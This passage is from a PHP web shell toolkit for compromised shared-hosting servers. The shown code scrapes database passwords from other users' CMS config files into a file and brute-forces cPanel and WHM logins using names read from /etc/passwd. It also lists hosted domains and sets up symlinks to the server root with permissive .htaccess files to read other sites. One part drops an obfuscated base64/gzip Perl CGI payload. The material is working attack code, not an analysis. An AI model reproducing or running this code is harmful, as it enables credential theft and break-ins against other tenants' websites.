                                            $pass=$dbu." ".$dbp."\n";
                                          fwrite($ffile,$pass);

                                  }


                          }


                         }
////////////////
// other cms ///
///////////////
                             if($check == "other")
                         {
                         $otherc=array("..config","..admin-conf");
                         foreach($otherc as $othercon)
                          {
                              $finalurl=$re.$usersss.$othercon;
                              $content=data($finalurl);

                              if($content && preg_match('/DB_DATABASE/i',$content))
                                 {

echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> got config file for unknwon cms for user $usersss  </font></td></tr></table>";

                                 echo "mysql server password ==> ". $dbp=entre2v2($content,"DB_PASSWORD', '","');");
                                    if(!empty($dbp))
                                            $pass=$dbp."\n";
                                          fwrite($ffile,$pass);

                                  }
elseif($content && preg_match('/dbpass/i',$content))
{

echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";

echo $db=entre2v2($content,"dbpass = '","';");
if(!empty($db))
$pass=$db."\n";
fwrite($ffile,$pass);
}
elseif($content && preg_match('/dbpass/i',$content))
{

echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> got config file for unknwon cms of user $usersss  </font></td></tr></table>";

echo $db=entre2v2($content,"dbpass = '","';");
if(!empty($db))
$pass=$db."\n";
fwrite($ffile,$pass);

}
elseif($content && preg_match('/dbpass/i',$content))
{

echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";

echo $db=entre2v2($content,"dbpass = \"","\";");
if(!empty($db))
$pass=$db."\n";
fwrite($ffile,$pass);
}


                          }
                         }


                 }
             }
              }
             else{
                  echo "<p>aapne pani jayada pee liya h =)), aap nashe may ho bhaiyu, please checkmark config files  ";
                 }

     }
?>


<?php
/////////////////////////////////
/////   cpanel cracker    ///////
/////////////////////////////////
?>


<form method=post>
<input type=submit name=cpanel value="Auto username/password loading cpanel cracker"><p>
<?php

if(isset($_POST['cpanel']))
{
?>
<form method=post><div align=center><table>
want to brute=><select name="op"> <option name="op" value="cp">CPanel</option>
<option name="op" value="whm">WHMPanel</option></table><p>
<textarea style="background:black;color:white" rows=20 cols=25 name=usernames ><?php $users=file("/etc/passwd");
foreach($users as $user)
{
$str=explode(":",$user);
echo $str[0]."\n";
}

?></textarea><textarea style="background:black;color:white" rows=20 cols=25 name=passwords >
<?php

$d=getcwd()."/P-list.txt";
$pf=file($d);
foreach($pf as $rt)
{
$str=explode('\n',$rt);
echo trim($str[0])."\n";
} ?></textarea><p>
<input type=submit name=cpanelcracking value="Start"></form>
<?php
}
?>


<?php
error_reporting(0);
$connect_timeout=5;
set_time_limit(0);

$userl=$_POST['usernames'];
$passl=$_POST['passwords'];
$attack=$_POST['op'];
$target = "localhost";

if(isset($_POST['cpanelcracking']))
{
if($userl!=="" && $passl!=="")
{
if($_POST["op"]=="cp")
{
$cracked=$_POST['crack'];
@fopen($cracked,'a');
echo "now we are attacking cpanels....please wait till the end of process \n";


}
elseif($_POST["op"]=="whm")
{
@fopen($cracked,'a');
echo "now we are attacking WHM panel....please wait till the end of process";

}

function cpanel($host,$user,$pass,$timeout){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 0 ){
echo "<table width=100% ><tr><td align=center><b><font color=white size=2>==================================</font><font color=red size=2> $user </font><font color=white size=2>cracked with </font><font color=red size=2> $pass </font> <font color=white size=2>==================================</font></b></td></tr></table>";


}

curl_close($ch);}

$userlist=explode("\n",$userl);
$passlist=explode("\n",$passl);

if ($attack == "cp")
{
foreach ($userlist as $user) {
echo "<div align=center><table width=80% ><tr><td align=center><b><font color=red size=1>Attacking user $user </font></td></tr></table>";
$finaluser = trim($user);
foreach ($passlist as $password ) {
$finalpass = trim($password);


cpanel($target,$finaluser,$finalpass,$connect_timeout);

}
}

}

function whm($host,$user,$pass,$timeout){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$host:2086");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 0 ){
echo "<table width=100% ><tr><td align=center><b><font color=white size=2>==================================</font><font color=red size=2> $user </font><font color=white size=2>cracked with </font><font color=red size=2> $pass </font> <font color=white size=2>==================================</font></b></td></tr></table>";


}


curl_close($ch);}
$userlist=explode("\n",$userl);
$passlist=explode("\n",$passl);

if ($attack == "whm")
{
foreach ($userlist as $user) {
echo "<table width=80% ><tr><td align=center><b><font color=white size=2>user under attack is $user </font></td></tr></table>";
$finaluser = trim($user);
foreach ($passlist as $password ) {
$finalpass = trim($password);

whm($target,$finaluser,$finalpass,$connect_timeout);
}
}
}
}
elseif($userl=="")
{
echo "what are you doing  :( , you have left userlist field empty";

}
elseif($passl=="")
{

echo "please put passwords in paasword list field";
}
}
?>

<body bgcolor=black><h3 style="text-align:center"><font color=red size=2 face="comic sans ms">
<form method=post><font color=white size=2 face="comic sans ms">extract domain names by valiases</font><br>
<input type=submit name=domain value="cat /etc/valiases/" /></form>
<?php
    if(isset($_POST['domain']))
    {


$yamsites=@file("/etc/named.conf");
if(!$yamsites)
{
    die('<script>alert("r00t@group:~# /etc/named.conf Not Found!!!")</script>');
}
echo "<div class=container><br /><center><font color=orange size=3 face=\"comic sans ms\">Total Domanis Found: </font><font color=red>".count($yamsites)."</font><br /><br /><table align=center border=1 width=59% cellpadding=5><tr><td>Domains</td><td>Users</td><td>Directory</font></td></tr>";
foreach($yamsites as $yamprog)
{
    if(eregi("zone", $yamprog))
    {
        preg_match_all('#zone "(.*)" #', $yamprog, $yamzone);
        flush();
        if(strlen(trim($yamzone[1][0]))>2)
        {
            $user=posix_getpwuid(@fileowner("/etc/valiases/".$yamzone[1][0]));
            echo "<tr><td><a href=http://www.".$yamzone[1][0]." target=_blank>".$yamzone[1][0]."</a><td>".$user['name']."
            </td><td><a href=/group.txt/root/home/".$user['name']."/public_html/ target=_blank>SymLink</a></td></tr>";
            flush();
        }
    }
}
echo '</table></div></body>';


        }


    ?>

<div align=center><table width=100% border=1><tr><td align=center></td></tr></table>

<font color=white size=4 face="comic sans ms">Perl based symlink ;)<br><form method=post>
    <input type=submit name=passx value="cat /etc/passwd"><p></form>
    <?php
if(isset($_POST['passx']))
{
    ?>
<textarea style="background:black;color:white" rows=20 cols=50 name=usernames  ><?php  $users=file("/etc/passwd");
foreach($users as $user)
{
$str=explode("\n",$user);
echo $str[0]."\n";
}

?></textarea>
<?php
}


?>


    <form method=post>

    <font size=5 color=white>==[[ <input type=submit name=perl value="Perl based  ln -s \m/"> ]]==</font></form>
    <p>


    <?php
if(isset($_POST['perl']))
{
    error_reporting(0);

$da='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';
$decryp=gzinflate(base64_decode($da));
mkdir('perl', 0777);
$hope = fopen("perl/.htaccess", 'w');
$hcon= "Options FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .root\nAddHandler cgi-script .root\nAddHandler cgi-script .root";
fwrite ( $hope, $hcon ) ;
$pelfile = fopen("perl/in.root" ,"w");
fwrite ($pelfile,$decryp);
    chmod("perl/in.root",0755);
   echo "<iframe src=perl/in.root width=50% height=70% ></iframe><br><br> ";
   echo "<font size=4>check in this directory for configuration files once you have done with this script<br><a href=perl/><u>yahaan Group-XP yahaan :)</u></a></font>";

}
?>
<table width=100% border=1><tr><td align=center></td></tr></table>
<font color=#00ff00 size=4>==[[ Cant read /etc/named.conf bypasser ]]==</font>

<form method=post>
    <input type=submit name="ms" value="What are you waiting for " /></form>


    <?php
    if(isset($_POST['ms']))
    {
        error_reporting(0);
        $cmd="ls /var/named";
        $r=shell_exec($cmd);


        mkdir('groupshell',0777);


$rr  = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$f = fopen('groupshell/.htaccess','w');

$groupshell = symlink("/","groupshell/root");

fwrite($f , $rr);
        ?><form method=post><textarea rows=1 cols=1 name=web><?php echo $r;?></textarea><br><input type=submit name=w value="one more time bhaiyu ^_^ " />
        </form>
        <?php

        }

error_reporting(0);
$webs=explode("\n",$_POST['web']);
if(isset($_POST['w']))
{
$webs=explode("\n",$_POST['web']);
echo "<table width=40% align=center border=1>
<tr><td align=center>Websites</td><td align=center>usernames</td><td>symlink</td></tr>";
foreach($webs as $f)
{
    $str=substr_replace($f,"",-4);


$user = posix_getpwuid(@fileowner("/etc/valiases/".$str));

echo "<table border=1 width=40%><tr><td align=center><font color=red>".$str."</font></td><td align=center><font color=white>".$user['name']."</td><td><a href=groupshell/root/home/".$user['name']."/public_html/>spin the shit </a></tr></table>"; flush();


    }

    }


?>